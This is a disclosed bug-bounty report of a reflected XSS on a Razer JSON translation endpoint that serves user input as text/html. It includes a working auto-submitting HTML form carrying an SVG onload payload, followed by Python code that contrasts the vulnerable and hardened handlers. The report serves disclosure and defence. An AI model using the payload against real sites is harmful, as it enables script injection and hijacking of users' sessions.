Razer US: Reflected XSS on the https://deals.razerzone.com/json/translation endpoint

2017-09-26T19:16:22
ID H1:272162
Type hackerone
Reporter sp1d3rs
Modified 2017-11-08T19:43:21

Description

Thanks to SP1D3RS for the great report and for working with the team on this one. This was a trivial POST-based XSS, caused by using the text/html Content-Type on a JSON endpoint, combined with the ability to control part of the response via unsanitized input.

Why did I disclose this if it is a trivial issue? I pretty often see this behavior on JSON endpoints in other programs. While a wrong Content-Type on the response is not a very big problem by itself, it can become one if the endpoint reflects some user-controlled input in the response and that input is not sanitized properly. If you see the same behavior somewhere, it is worth a closer look!

Used POC

<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script>
// Auto-submit the form as soon as the page loads (jQuery is used only for this).
$(document).ready(function(){ $('#frm').submit(); });
</script>
</head>
<body>
<form id="frm" method="POST" action="https://deals.razerzone.com/json/translation">
<!-- The "key" parameter is reflected unsanitized into a response served as text/html,
     so the browser parses it as a document and runs the SVG onload handler. -->
<input type="hidden" name="key" value="<svg onload=alert(document.domain);>">
<input type="submit" value="test">
</form>
</body>
</html>
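To make the root cause concrete, here is an added example (my own illustration, not Razer's code or the reporter's PoC) that models the two halves of the bug: a hypothetical handler that echoes the submitted "key" into an error body served as text/html, next to a hardened version that serves application/json with nosniff and additionally escapes angle brackets inside the JSON so the body is inert even if some client renders it as HTML. The check function at the end is the same test a practitioner would run against any JSON endpoint that reflects input: does the declared type make a browser render it as a document, and does the marker come back verbatim? The endpoint logic and the error message format are assumptions; only the payload comes from the PoC above.

```python
import json
from typing import Dict, Tuple

# Same payload the original PoC submits in the "key" field.
PAYLOAD = "<svg onload=alert(document.domain);>"

Response = Tuple[Dict[str, str], str]  # (headers, body)


def vulnerable_translation(key: str) -> Response:
    """Hypothetical stand-in for the described behavior: the lookup fails,
    the raw key is concatenated into the error text, and the JSON is sent
    as text/html. A browser parses the body as an HTML document."""
    body = '{"error":"translation not found for key ' + key + '"}'
    headers = {"Content-Type": "text/html; charset=utf-8"}
    return headers, body


def json_html_safe(obj) -> str:
    """Serialize to JSON, then escape <, > and & as \\uXXXX. These characters
    only ever occur inside JSON string literals, so the replacement cannot
    break the structure, and json.loads() still yields the original values."""
    text = json.dumps(obj, ensure_ascii=False)
    return text.replace("&", "\\u0026").replace("<", "\\u003c").replace(">", "\\u003e")


def hardened_translation(key: str) -> Response:
    """Correct Content-Type, sniffing disabled, and HTML-significant
    characters escaped inside the JSON body."""
    body = json_html_safe({"error": "translation not found for key " + key})
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def hardened_roundtrip(key: str) -> str:
    """Show that the escaping is lossless for a JSON consumer."""
    _, body = hardened_translation(key)
    return json.loads(body)["error"]


def is_reflected_xss_candidate(headers: Dict[str, str], body: str, marker: str) -> bool:
    """Flag a response that a browser would render as HTML and that contains
    the submitted marker unmodified. This is the triage check for the
    pattern described in the report."""
    content_type = headers.get("Content-Type", "").split(";", 1)[0].strip().lower()
    nosniff = headers.get("X-Content-Type-Options", "").strip().lower() == "nosniff"
    # text/html is rendered outright; a missing type may be sniffed unless nosniff is set.
    renders_as_html = content_type == "text/html" or (content_type == "" and not nosniff)
    return renders_as_html and marker in body


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_translation), ("hardened", hardened_translation)):
        headers, body = handler(PAYLOAD)
        flagged = is_reflected_xss_candidate(headers, body, PAYLOAD)
        print(f"{name}: Content-Type={headers['Content-Type']!r} exploitable={flagged}")
        print("  body:", body)
```

Note that the escaping in json_html_safe is defense in depth: the fix that actually matters is the Content-Type plus nosniff. The escaping covers the case where a framework or proxy later rewrites the type, which is exactly the kind of drift that produced this finding.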

Thanks to the Razer team, and thanks to the H1 triage team and @coffeecup personally for quickly reopening this from the Duplicate state and triaging it!